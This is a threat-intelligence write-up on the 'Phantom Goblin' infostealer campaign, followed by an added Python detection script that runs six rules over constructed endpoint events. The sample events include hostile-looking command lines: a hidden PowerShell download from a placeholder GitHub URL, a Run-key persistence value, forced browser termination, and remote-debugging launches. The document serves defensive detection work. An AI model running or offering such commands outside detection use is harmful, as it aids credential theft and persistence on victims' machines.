A sophisticated malware operation, dubbed “Phantom Goblin,” has been identified by cybersecurity researchers at Cyble.
This operation leverages social engineering tactics to distribute information-stealing malware, primarily targeting web browsers and developer tools for data theft and unauthorized system access.
The malware is distributed via RAR attachments containing a malicious LNK file disguised as a PDF document.
Once executed, this LNK file triggers a PowerShell command that retrieves additional payloads from a GitHub repository.
These payloads include binaries named “updater.exe,” “vscode.exe,” and “browser.exe,” which are designed to mimic legitimate applications.
The malware ensures persistence by adding a registry entry, allowing it to execute scripts from the GitHub repository every time the system starts.

Malware Capabilities and Techniques
Phantom Goblin employs several techniques to evade detection and steal sensitive information.
It forcefully terminates browser processes to extract cookies and login credentials from Chrome, Brave, Edge, and other browsers.
The malware uses remote debugging to bypass Chrome’s App Bound Encryption (ABE), allowing it to access and exfiltrate sensitive data without the user noticing.
Additionally, it establishes a Visual Studio Code (VSCode) tunnel to maintain unauthorized remote access to compromised systems.
According to the CRIL report, this VSCode tunnel enables threat actors to control systems without triggering traditional security alerts, as it uses legitimate VSCode binaries to blend in with normal system operations.
The malware also collects a wide range of browser-related data, including browsing history, visited websites, login credentials, and installed extensions.
This data is organized into JSON files and archived before being transmitted to a Telegram channel using the Telegram Bot API.
The use of Telegram for data exfiltration allows the threat actors to receive stolen information remotely without direct interaction, ensuring stealthy data transfer and persistence.

Recommendations for Mitigation
To protect against Phantom Goblin and similar threats, users should avoid opening unexpected RAR or ZIP attachments and enable advanced email filtering to block potentially malicious files.
Deploying robust endpoint protection with real-time threat detection can help identify malicious processes and suspicious file downloads.
Restricting the use of PowerShell and enforcing strict access controls for VSCode tunnels are also recommended.
Monitoring outbound network traffic for unusual Telegram API activity or untrusted external servers can help detect and prevent data exfiltration attempts.
By implementing these measures, organizations can significantly reduce their vulnerability to such sophisticated cyber threats.
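The infection chain in the first section (LNK-launched PowerShell fetching from GitHub, a registry run entry, browser termination, remote debugging, a VSCode tunnel) and the monitoring advice in this section together suggest a small set of host and network detections. The script below is an added example, not code from Cyble or the CRIL report: it runs six such rules over a handful of constructed endpoint events. The event schema, the placeholder GitHub repository path, the file paths and the process parent/child pairs are all assumptions made for illustration; only the binary names, the browsers, GitHub and the Telegram Bot API host come from the write-up. Map the field names onto your own EDR or Sysmon schema before reuse.

```python
"""Triage of constructed endpoint events for a Phantom Goblin-style chain.

Added example. Events, field names and paths are constructed and do not come
from the Cyble report; 'PLACEHOLDER' stands in for a repository name the page
does not give.
"""
import re

# Payload names the report says the malware uses (from the page).
MIMIC_BINARIES = {"updater.exe", "vscode.exe", "browser.exe"}
# Browsers named in the report as targets.
BROWSERS = {"chrome.exe", "brave.exe", "msedge.exe"}
GITHUB_RE = re.compile(r"https?://(raw\.)?github(usercontent)?\.com/", re.I)

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "parent_cmdline": "explorer.exe Invoice.pdf.lnk",
     "cmdline": 'powershell -w hidden -c "iwr https://raw.githubusercontent.com/PLACEHOLDER/repo/main/updater.exe -OutFile $env:APPDATA\\updater.exe"'},
    {"type": "registry", "image": "powershell.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "powershell -w hidden -f https://raw.githubusercontent.com/PLACEHOLDER/repo/main/run.ps1"},
    {"type": "process", "parent": "updater.exe", "image": "taskkill.exe",
     "cmdline": "taskkill /F /IM chrome.exe"},
    {"type": "process", "parent": "browser.exe", "image": "chrome.exe",
     "cmdline": "chrome.exe --remote-debugging-port=9222 --headless"},
    {"type": "process", "parent": "updater.exe", "image": "vscode.exe",
     "cmdline": r"C:\Users\u\AppData\Roaming\vscode.exe tunnel"},
    {"type": "network", "image": "browser.exe", "dest_host": "api.telegram.org", "dest_port": 443},
    # Benign control: the real Telegram desktop client talking to the same host.
    {"type": "network", "image": "Telegram.exe", "dest_host": "api.telegram.org", "dest_port": 443},
    {"type": "process", "parent": "services.exe", "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]


def rule_lnk_powershell_download(e):
    """PowerShell started from a shortcut and pulling content from GitHub."""
    return (e["type"] == "process" and e["image"].lower() == "powershell.exe"
            and ".lnk" in e.get("parent_cmdline", "").lower()
            and GITHUB_RE.search(e.get("cmdline", "")) is not None)


def rule_run_key_persistence(e):
    """Run-key value that launches PowerShell or points at GitHub (assumed key location)."""
    return (e["type"] == "registry" and e["key"].lower().endswith(r"\currentversion\run")
            and ("powershell" in e["value"].lower() or GITHUB_RE.search(e["value"]) is not None))


def rule_browser_kill(e):
    """Forced termination of a browser, a precursor to cookie/credential theft."""
    return (e["type"] == "process" and e["image"].lower() == "taskkill.exe"
            and any(b in e["cmdline"].lower() for b in BROWSERS))


def rule_browser_remote_debugging(e):
    """Browser launched with remote debugging, which the report ties to the ABE bypass."""
    return (e["type"] == "process" and e["image"].lower() in BROWSERS
            and "--remote-debugging-port" in e["cmdline"].lower())


def rule_vscode_tunnel(e):
    """Tunnel started by a mimic binary or from a user-writable profile path (assumed)."""
    return (e["type"] == "process" and "tunnel" in e["cmdline"].lower()
            and (e["image"].lower() in MIMIC_BINARIES or "\\appdata\\" in e["cmdline"].lower()))


def rule_telegram_bot_api(e):
    """Outbound Telegram API traffic from anything other than an approved client."""
    return (e["type"] == "network" and e["dest_host"].lower() == "api.telegram.org"
            and e["image"].lower() != "telegram.exe")


RULES = {
    "lnk_powershell_download": rule_lnk_powershell_download,
    "run_key_persistence": rule_run_key_persistence,
    "browser_kill": rule_browser_kill,
    "browser_remote_debugging": rule_browser_remote_debugging,
    "vscode_tunnel": rule_vscode_tunnel,
    "telegram_bot_api": rule_telegram_bot_api,
}


def triage(events):
    """Return one finding per (event, rule) match, in event order."""
    findings = []
    for idx, e in enumerate(events):
        for name, rule in RULES.items():
            if rule(e):
                findings.append({"index": idx, "rule": name, "image": e["image"]})
    return findings


def chain_score(findings):
    """Number of distinct chain stages seen on the host; several together is far stronger than any one."""
    return len({f["rule"] for f in findings})


if __name__ == "__main__":
    hits = triage(SAMPLE_EVENTS)
    for h in hits:
        print(f"event {h['index']:>2} {h['image']:<15} -> {h['rule']}")
    print("distinct stages:", chain_score(hits))
```

Each rule on its own is noisy (developers do use remote debugging and VS Code tunnels), which is why `chain_score` counts distinct stages per host: a shortcut-spawned PowerShell download, a run-key entry and a tunnel from `%APPDATA%` on the same machine within a short window is worth an alert even when each event alone is not.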